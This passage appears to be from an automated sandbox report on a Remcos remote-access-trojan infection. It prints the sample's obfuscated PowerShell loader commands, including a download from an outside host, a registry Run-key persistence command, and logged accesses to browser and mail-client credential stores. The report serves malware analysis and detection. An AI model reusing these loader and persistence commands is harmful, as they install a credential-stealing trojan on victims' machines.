boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "naergaaende" /t reg_expand_sz /d "%trkkerdrengens% -w 1 $tenementize=(get-itemproperty -path 'hkcu:\wabbles\').erende29;%trkkerdrengens% ($tenementize)" Jump to behavior
Source: wab.exe, 00000013.00000003.1904033991.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1906883419.0000000008779000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.1903052624.0000000008779000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 26_2_0041881C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 27_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0041739B GetVersionExW, 26_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 27_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 27_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 27_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 1652, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU Jump to behavior
Source: Yara match File source: 00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs